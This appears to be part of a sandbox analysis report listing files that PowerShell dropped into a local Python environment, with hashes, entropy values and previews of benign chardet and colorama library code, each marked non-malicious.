                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4007
                                                                                                                                                                                                                              Entropy (8bit):4.670653417189332
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kt17u4R4hykKv6HmZoqEq+gZ23eD85AiIIEpB:Kt17u42hNKv631Rc
                                                                                                                                                                                                                              MD5:0FE9125A9CB6729652C6BB3499D9D30C
                                                                                                                                                                                                                              SHA1:37A290928D585660239B359108D70E3330F6DAF4
                                                                                                                                                                                                                              SHA-256:6AA42E7CCCD1C38E99A45973998698793DBE9F398A6FE86672B029A6927CEB69
                                                                                                                                                                                                                              SHA-512:BCF78742B541954F63FDF182F208FD6327EAF35327C7D90B71366A4348EDD65946CAB5805360CD6A98B93D41AF214D8E1A4A291900F24BD1F5A75FCBDB21EE1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                              Entropy (8bit):4.560565207034019
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Ptzcu4QKxOT5BIL12l+R4/e3b/1TDnU8ubVH+f92/B5:mu43EICLNr
                                                                                                                                                                                                                              MD5:BE007F9AD3290428E17D22F05AF73F9A
                                                                                                                                                                                                                              SHA1:14FDAB65867615120EBD88FA22CB0D712A13AEF7
                                                                                                                                                                                                                              SHA-256:C5806B838C7475DF569D3F2A7257C00D50FDA2776B50D92A3E6BED7B5A5AE76D
                                                                                                                                                                                                                              SHA-512:C03E4EB43315D406B8F02AE3DBD00B4E24D2CA9B9B506C5C10A02DE1857D8151EEDF3C91E2377EBE77847D66815E26E0846D6DFD937EB3A29573AA2124B5EABD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):4.774389904733735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:pT0uwyUjHSXMzJUSCX4G01256J6pxH1zJ6zxH9+kX/tGG1oQc1oam1Wpo1WfP7bJ:eu4bJUSX25j+9Uq2DullQtWJQSbbVU+i
                                                                                                                                                                                                                              MD5:4D34060228ED8402068A1C60098D7BF9
                                                                                                                                                                                                                              SHA1:5EB297221674D3AFE3D2475B26B7D36BD8BF213F
                                                                                                                                                                                                                              SHA-256:A70D5EA4674C8F58431A20AED401EAAB33847E35FC3157625BB3B50654FCF9E4
                                                                                                                                                                                                                              SHA-512:A72E6F83A6D3E2391C1FCF8C558D06EE3919642759382A3CE501C366F0613BBB34AD125A3BE83A6CBDF2B59B67E4389B5AE6256E3AA293636D92CBE834F09D66
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.#.# Contributor(s):.# Jason Zavaglia.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to the Free Software.# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA.# 02110-1301 USA.######################### END LICENSE BLOCK #########################.from typing import List, Union..from .charsetprober import CharSetProber.from .enums import Pr
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2812
                                                                                                                                                                                                                              Entropy (8bit):4.857491538810323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Kx/1ef0uwyUjHS/t/TDJ018bFsQ6H5RZvMaqEqKTYtII4aK:Kt17u42/TDJ08sQ6Hh9qEqLtIIdK
                                                                                                                                                                                                                              MD5:6E9466A0EB1CE8EDC2E8EE3285E2B0D5
                                                                                                                                                                                                                              SHA1:B6EB73CA0C77927DEB2ACE9CDFC2EB2D3AAFDCC7
                                                                                                                                                                                                                              SHA-256:F26D3C51BE78F741F88D0E8B617BC5CAC1AD80AA0AB0751DDB31FF8BCFD39D5C
                                                                                                                                                                                                                              SHA-512:81582FA9790533339422B5C0BD8ADEABF63382CD1FD15EA63DDCEF266E8BD4ECB3EC742B3BB6DA93ECEC088317C4D508F45FBC2D5FAA658151EFCBEE57FBC3C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):244
                                                                                                                                                                                                                              Entropy (8bit):4.90617676655079
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:2EJMHUYLQBHmZvDZVuFFeHNDdESzQPXqMC42Yt7QF6fHzu:8HYGZv1VuaXE7vqMbGMTu
                                                                                                                                                                                                                              MD5:F1253F0BC2341101E1FF0F48F857BB21
                                                                                                                                                                                                                              SHA1:C132772AE9DA96DDC56658DF9BF1A380D4286156
                                                                                                                                                                                                                              SHA-256:946B4973118CE38433E026E4E2B6DB9AB2B19CDAF5FBDED4DB94DA99E2DE859C
                                                                                                                                                                                                                              SHA-512:94BC8FCF914FCC1E1EFA0B46B1DD711803A84BC42834C26BA11269A99BB7DD70D2CC353A805FF6A92D9F21708A80EC206C86DF4A1FEF5B0AA54F2D468ECB2B71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".This module exists only to simplify retrieving the version number of chardet.from within setuptools and from chardet subpackages...:author: Dan Blanchard (dan.blanchard@gmail.com)."""..__version__ = "5.1.0".VERSION = __version__.split(".").
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                                                                              Entropy (8bit):4.90718433069644
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:S3cSFtEXVIoTs1W8VHRLbxAiAGy21cgJmFMxPMxKyKT6iY1Cvv:Qc2tqIoTs48V9HA1pYPMxKjT6NCvv
                                                                                                                                                                                                                              MD5:C2DAA3DFAB2BA0694195CF5F15A32808
                                                                                                                                                                                                                              SHA1:E8A71D394BDBC28A81CF1AE55F238308DED93508
                                                                                                                                                                                                                              SHA-256:C1E3D0038536D2D2A060047248B102D38EEE70D5FE83CA512E9601BA21E52DBF
                                                                                                                                                                                                                              SHA-512:A8F938BA770E588069EC394204F420D70FF4DBBE36B6F9B811140E097FD277903E17744681D5BF21D4F77E8AD3EA6D22C3DA559F0C1C4FFE0F3F0E4332F52D27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..from .initialise import init, deinit, reinit, colorama_text, just_fix_windows_console.from .ansi import Fore, Back, Style, Cursor.from .ansitowin32 import AnsiToWin32..__version__ = '0.4.6'..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):475
                                                                                                                                                                                                                              Entropy (8bit):5.354469458844126
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:3cJBn+8mkvOjwqOOsWWz8zSt+KNnaijaZx9E:3cJQhk3qOOHWz8zSgKNnOZA
                                                                                                                                                                                                                              MD5:B44E50F40AEB23895F5DD5D775439C41
                                                                                                                                                                                                                              SHA1:6E8FE485D17679C8520360927B7BE13BD54F87A1
                                                                                                                                                                                                                              SHA-256:24B9A13CC6F250C3779B7557F3F12341374FDD24CAC08F8BC4B4700EDD116648
                                                                                                                                                                                                                              SHA-512:788C1ACBB21D802B1CE434CDFBE4887DE3142A2813936934AB65D6A58AD6164A4B85C924C2E28E390B7447F69C35C928F7D651022E253F1A2E1AA8B6DEBCFE2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................H.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.y.)......)...init..deinit..reinit..colorama_text..just_fix_windows_console)...Fore..Back..Style..Cursor)...AnsiToWin32z.0.4.6N)...initialiser....r....r....r....r......ansir....r....r....r......ansitowin32r......__version__........NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/__init__.py..<module>r........s...........U..U..+..+..$.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3933
                                                                                                                                                                                                                              Entropy (8bit):5.05098077105993
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ML2TmpN3TrHSePKfjFermWi8BheGflO+f6deYu4SoV/CRR57At51VDJ0GaIK/MHq:g20xTrHDPnmChfhyNrt9CRiK/kK
                                                                                                                                                                                                                              MD5:F51948ADA209D6183B29E4399A5849A5
                                                                                                                                                                                                                              SHA1:1C02AC3CFFA9D74EF7BD21CFACDB037C85A68875
                                                                                                                                                                                                                              SHA-256:3B464E5D901A5587F729693AB285E980349CF96E52B3FA775F194BBC39DE4F9A
                                                                                                                                                                                                                              SHA-512:5CB627918716A190B43DD60E2E0AAEE3BCABE98A553D0FE87DD294A72D7A775BF2F102159074A2301708015DB41ED211409A00BB046FE395EA1AD73DC74A7BC6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.d...Z.d.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.........Z...e.........Z...e.........Z...e.........Z.y.).z..This module generates ANSI character codes to printing colors to terminals..See: http://en.wikipedia.org/wiki/ANSI_escape_code.z..[z..]...c.....................,.....t.........t.........|.........z...d.z...S.).N..m....CSI..str)...codes.... .JC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/ansi.py..code_to_charsr.....................T...?.S.. .. .....c.....................(.....t.........d.z...|.z...t.........z...S.).Nz.2;)...OSC..BEL)...titles.... r......set_titler........s............:.........#..#r....c.....................,.....t.........t.........|.........z...d.z...S.).N..Jr........modes.... r......clear_screenr........r....r....c.....................,.....t.........t.........|.........z...d.z...S.).N..Kr.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16404
                                                                                                                                                                                                                              Entropy (8bit):4.847758795470786
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:MYCy1Aw71NlaJ5VJAAEUuAAta0rVgtkR3Rz5GIpw51:MYHAq1Nlo5VGAEUFAU0pskRhlxwz
                                                                                                                                                                                                                              MD5:3E0BECB2B1E54E5A7768639D05D9ED13
                                                                                                                                                                                                                              SHA1:75C2CFEB660DCDCD4396C0AD5EDA9A31251AA738
                                                                                                                                                                                                                              SHA-256:8EE66BFB1CE89E09CE5AE7DD2FE9854E1810396FBEDFB858F046F93DD2415B04
                                                                                                                                                                                                                              SHA-512:DFD4CAAB33CF8CC18E7D8A490EE54EB8CB61CC2EB94E77D9D0006DCE0A54A11E492ACB2CF478A3F91147E535C6CB57EA93D74FFADCAA2B89F75EF4059B04910A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfx+.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.e.....e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......N.....)...AnsiFore..AnsiBack..AnsiStyle..Style..BEL)...enable_vt_processing..WinTerm..WinColor..WinStyle)...windll..winapi_testc.....................P.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.e.d...........Z.y.)...StreamWrapperz.. Wraps a stream (such as stdout), acting as a transparent proxy for all. attribute access apart from method 'write()', which is delegated to our. Converter instance.. c..................... .....|.|._.........|.|._.........y...N)..._StreamWrapper__wrapped.._StreamWrapper__convertor)...self..wrapped..converters.... .QC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/ansitowin32.py..__init__z.StreamWrapper.__init__....s..........!......$..........c...........................t.........|.j...............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3533
                                                                                                                                                                                                                              Entropy (8bit):4.727975820376126
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:/y+wpH8LJaV80lUYl3/MLzZKcWx97pLoY7LDnXkt:KhpcF3AUYl3kfAcWf9U2Xg
                                                                                                                                                                                                                              MD5:FB3468A2A59C3ECFFE50E44BC0FF251F
                                                                                                                                                                                                                              SHA1:8A459030F1FDF245FA2EC2BD86D261CA7A79940A
                                                                                                                                                                                                                              SHA-256:883C4106BB5AD821567554D08B517DB1E897304198E082C6D03E5E789630E186
                                                                                                                                                                                                                              SHA-512:564D753005C36CE8188DFCA63A9DE36D38E45F923214BB55F7F480C43CD71ACB8E2575DB4812ABC16CCBF4AFAF38639DCD4B8DB5B0C004317D7E6BA3339B7ED8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.d.d...Z.d...Z.d...Z.e.j...................d...........Z.d...Z.d...Z...e...........y.)......N.....)...AnsiToWin32c.....................n.....d.a.d.a.d.a.d.a.d.a.d.a...t.........j...................t...................y.#.t.........$.r...Y.y.w.x.Y.w.).NF)...orig_stdout..orig_stderr..wrapped_stdout..wrapped_stderr..atexit_done..fixed_windows_console..atexit..unregister..reset_all..AttributeError........PC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/initialise.py.._wipe_internal_state_for_testsr........sL.........K....K......N....N......K...."..................)..$..................s......(...4...4.c.....................L.....t...........t.........t.................j.............................y.y...N).r....r....r....r....r....r....r....r.... ...s................K.. ..*..*..,.....r....c..........................|.s.t.........|.|.|.g.........r.t.........d...........t.........j.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8109
                                                                                                                                                                                                                              Entropy (8bit):4.851683060811028
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:f0OebTA3miDe1wC9vlqNmyCdg2P7yrl2n+YdUCxtJwon9B5xl8j4HBhaDuoTV4:iExq1wC9NqNmdV7yL9CxLwoLK8HB0+
                                                                                                                                                                                                                              MD5:191B9C8DB4D64875C4282E545241A9DB
                                                                                                                                                                                                                              SHA1:3B7BC1EE216E5E767DAF255C79826543C19D956C
                                                                                                                                                                                                                              SHA-256:936E50A1988F24B649E9C13A3ED65ED800E5A6229D2DB886F8894272CFCBEC10
                                                                                                                                                                                                                              SHA-512:36A4C85EF9CFE367C2D8EE8BD55B9643568CEE2482423C8D71C881373DF82FEB5223ECC1F83947A437B0F32874F4FF85F6D6A289F8CCD0FB13FD3CE56A87CA18
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf%...............................d.Z.d.Z.d.Z...d.d.l.Z.d.d.l.m.Z.....e.e.j...........................Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.j...................Z...G.d...d.e.........Z.e.j...................j ..................Z.e.j$..................g.e._.........e.j(..................e._.........e.j...................j,..................Z.e.j(....................e.e.........g.e._.........e.j0..................e._.........e.j...................j2..................Z.e.j(..................e.j6..................g.e._.........e.j0..................e._.........e.j...................j8..................Z.e.j(..................e.g.e._.........e.j0..................e._.........e.j...................j<..................Z.e.j(..................e.e.j$..................e...e.e.j$..........................g.e._.........e.j0..................e._.........e.j...................j@..................Z!e.j(..................e.j6..................e.j$..................e...e.e.j$................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9071
                                                                                                                                                                                                                              Entropy (8bit):4.707352784164344
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:VQk6DXtqwpR1/hkVKJvjJ9WiUcw/HbHLeohJkhzAbpQ0raoWbzj6wSXPx:y37tXTXvj3xUh/7HqohsAFRrao66wSp
                                                                                                                                                                                                                              MD5:F359BBEF26E7F29EDF92713F1231EA9B
                                                                                                                                                                                                                              SHA1:E9CA6049E42EB31F886C32C45997DF4B8C7A3548
                                                                                                                                                                                                                              SHA-256:EFC3E0244CB4C30F4C967071A08CF57806E726FBA7CCDDB3A0060DED7A737A85
                                                                                                                                                                                                                              SHA-512:6294CA6C8DE6F3A26DB1B4F13AC5AC41FBA7160BBC77232622693F92F8B6455617F6364127F9BA01382D102A3994775E56E3CC78E560893BAA930FC7B6C767EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.................................d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d...Z.y.#.e.$.r...d...Z.Y..5w.x.Y.w.)......)...get_osfhandlec...........................t.........d...........).Nz.This isn't windows!)...OSError)..._s.... .MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/winterm.pyr....r........s...........+..,..,..........)...win32c.....................,.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.)...WinColorr....r..................................N)...__name__..__module__..__qualname__..BLACK..BLUE..GREEN..CYAN..RED..MAGENTA..YELLOW..GREY..r....r....r....r........s*.........E....D....E....D....C....G....F....Dr....r....c...........................e.Z.d.Z.d.Z.d.Z.d.Z.y.)...WinStyler.............N).r....r....r......NORMAL..BRIGHT..BRIGHT_BACKGROUNDr....r....r....r ...r .......s..........F....F......r....r ...c.....................r.....e.Z.d.Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2522
                                                                                                                                                                                                                              Entropy (8bit):4.698572934399895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Utghm2eyryyem/yB/bylEylVrLZfGRoHbrrnx44yiwRlEci4CGVlW0RLf37aNqE4:UtghReYyeyNbuEuVZmmx45YcHCSMYLfv
                                                                                                                                                                                                                              MD5:F781D59416D57343BE4FA5AA95675F57
                                                                                                                                                                                                                              SHA1:A46F95349F8D9E1D10885510F90A4F0C19380AE3
                                                                                                                                                                                                                              SHA-256:4E8A7811E12E69074159DB5E28C11C18E4DE29E175F50F96A3FEBF0A3E643B34
                                                                                                                                                                                                                              SHA-512:54396288C653A9BA5259FF3FB30079C31B157C0FD124DE345B6C8299923C08109283229E24D2E11294241BF6B78CA370CCD28F1AE605534876C4DAE43A2E7ACE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..'''.This module generates ANSI character codes to printing colors to terminals..See: http://en.wikipedia.org/wiki/ANSI_escape_code.'''..CSI = '\033['.OSC = '\033]'.BEL = '\a'...def code_to_chars(code):. return CSI + str(code) + 'm'..def set_title(title):. return OSC + '2;' + title + BEL..def clear_screen(mode=2):. return CSI + str(mode) + 'J'..def clear_line(mode=2):. return CSI + str(mode) + 'K'...class AnsiCodes(object):. def __init__(self):. # the subclasses declare class attributes which are numbers.. # Upon instantiation we define instance attributes, which are the same. # as the class attributes but wrapped with the ANSI escape sequence. for name in dir(self):. if not name.startswith('_'):. value = getattr(self, name). setattr(self, name, code_to_chars(value))...class AnsiCursor(object):. def UP(self, n=1):. retur
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11128
                                                                                                                                                                                                                              Entropy (8bit):4.618351623928578
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UtyutlW/vTYhXzmn4J60C8Io/v9xySsvwkdBapR1Qip8bZeh/owG6xFMxKX:UIutzha4J5C8lkSawOgkipCicLM
                                                                                                                                                                                                                              MD5:0CA18C79C4292FCE0B3067B001B53B45
                                                                                                                                                                                                                              SHA1:8D34CE03D75088979C2003C33B17C6E089253084
                                                                                                                                                                                                                              SHA-256:BCF3586B73996F18DBB85C9A568D139A19B2D4567594A3160A74FBA1D5E922D9
                                                                                                                                                                                                                              SHA-512:E74D8079378C86795D0F3A99E6C3EC21E27C3C56F023E9683D7D3107F298ECC60F75F7A3130108963179FB4C3A8F81087A757340FA4DDF83634025CD3235701A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import re.import sys.import os..from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style, BEL.from .winterm import enable_vt_processing, WinTerm, WinColor, WinStyle.from .win32 import windll, winapi_test...winterm = None.if windll is not None:. winterm = WinTerm()...class StreamWrapper(object):. '''. Wraps a stream (such as stdout), acting as a transparent proxy for all. attribute access apart from method 'write()', which is delegated to our. Converter instance.. '''. def __init__(self, wrapped, converter):. # double-underscore everything to prevent clashes with names of. # attributes on the wrapped stream object.. self.__wrapped = wrapped. self.__convertor = converter.. def __getattr__(self, name):. return getattr(self.__wrapped, name).. def __enter__(self, *args, **kwargs):. # special method lookup bypasses __getattr__/__getattribute__, see.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3325
                                                                                                                                                                                                                              Entropy (8bit):4.49426421342873
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:UtLj4qKkW6ByXjWR0gGSWgomkxNsLkW9KuflxptRccBRRQQQpo8WmzNihqYVnh0E:UtLEla0gagok5RcWRpQo9eRUR3MLO
                                                                                                                                                                                                                              MD5:1A15620A349C61B3C9C135DFCD47BD73
                                                                                                                                                                                                                              SHA1:0CFA12DFBF9E9ABB772F0FC781CA0F75CAE571A8
                                                                                                                                                                                                                              SHA-256:FA1227CBCE82957A37F62C61E624827D421AD9FFE1FDB80A4435BB82AB3E28B5
                                                                                                                                                                                                                              SHA-512:BBE4E527601802C793019455FC3BA2AE9A52E250D56893F227CC9F9A8B6623273B3B2F6D82D91B4AAF42B890DC0B9EEF7492C97B8A59F715BDA4C35C6F4BD7AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import atexit.import contextlib.import sys..from .ansitowin32 import AnsiToWin32...def _wipe_internal_state_for_tests():. global orig_stdout, orig_stderr. orig_stdout = None. orig_stderr = None.. global wrapped_stdout, wrapped_stderr. wrapped_stdout = None. wrapped_stderr = None.. global atexit_done. atexit_done = False.. global fixed_windows_console. fixed_windows_console = False.. try:. # no-op if it wasn't registered. atexit.unregister(reset_all). except AttributeError:. # python 2: no atexit.unregister. Oh well, we did our best.. pass...def reset_all():. if AnsiToWin32 is not None: # Issue #74: objects might become None at exit. AnsiToWin32(orig_stdout).reset_all()...def init(autoreset=False, convert=None, strip=None, wrap=True):.. if not wrap and any([autoreset, convert, strip]):. raise ValueError('wrap=False conflicts wi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):75
                                                                                                                                                                                                                              Entropy (8bit):4.7802159849746255
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:S3cXDDFNiFtEXVg1bcFpsygrb:S3cSFtEXVIoTsb
                                                                                                                                                                                                                              MD5:B1FDA43E92DEC74456EF61C18B3071FF
                                                                                                                                                                                                                              SHA1:9E20DB9E534400745B7329D70DC87E8833201B18
                                                                                                                                                                                                                              SHA-256:32480F004CC641DF91AB4C343D95D25F62DA7515A150409C8AC258F254AB9B84
                                                                                                                                                                                                                              SHA-512:E4A6DE313A0CABDA0BAFDA1A17E0B83C994A5C26C5C6B35BB4E8CA3EC4D6850E58272AA14FBC999F2DF59F7D7D23A8CE5AAEB52C4051B2D45905C07B80DA423D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
